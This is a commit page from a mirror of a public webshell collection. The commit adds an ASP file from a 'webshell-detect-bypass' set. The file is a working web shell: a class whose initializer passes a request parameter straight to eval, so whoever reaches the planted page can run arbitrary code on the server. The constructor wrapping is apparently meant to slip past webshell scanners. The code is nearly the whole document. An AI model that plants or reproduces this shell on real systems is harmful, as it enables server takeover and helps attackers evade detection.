mirror of
https://github.com/tennc/webshell.git
synced 2025-12-10 09:49:07 +00:00
webshell-detect-bypass
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp author: Build By LandGrey
This commit is contained in:
9
asp/class-initialize.asp
Normal file
9
asp/class-initialize.asp
Normal file
@@ -0,0 +1,9 @@
|
||||
<%
|
||||
Class LandGrey
|
||||
Private Sub Class_Initialize
|
||||
eval (request("LandGrey"))
|
||||
End Sub
|
||||
End Class
|
||||
|
||||
Set X = New LandGrey
|
||||
%>
|
||||
Reference in New Issue
Block a user